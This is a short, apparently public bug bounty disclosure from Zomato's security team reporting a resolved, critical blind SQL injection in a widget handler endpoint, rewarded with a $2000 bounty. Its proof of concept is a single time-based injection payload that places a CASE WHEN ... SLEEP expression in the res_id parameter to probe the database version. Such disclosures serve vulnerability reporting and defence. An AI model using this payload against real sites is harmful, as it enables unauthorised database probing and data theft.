[www.zomato.com] Blind SQL Injection in /php/widgets_handler.php
Critical
Z
Zomato
Submitted None
Team Summary
Official summary from Zomato
Disclosing it as per the request from @zzzhacker13. This report is identical to #838855 but it was just on a different endpoint. ### POC - - `:/php/widgets_handler.php?method=getResWidgetButton&res_id=51-CASE/**/WHEN(LENGTH(version())=10)THEN(SLEEP(6*1))END` Zomato Security Team
Actions:
Reported by
zzzhacker13
Report Details
Additional information and metadata
State
Closed
Substate
Resolved
Bounty
$2000.00
Submitted
Weakness
SQL Injection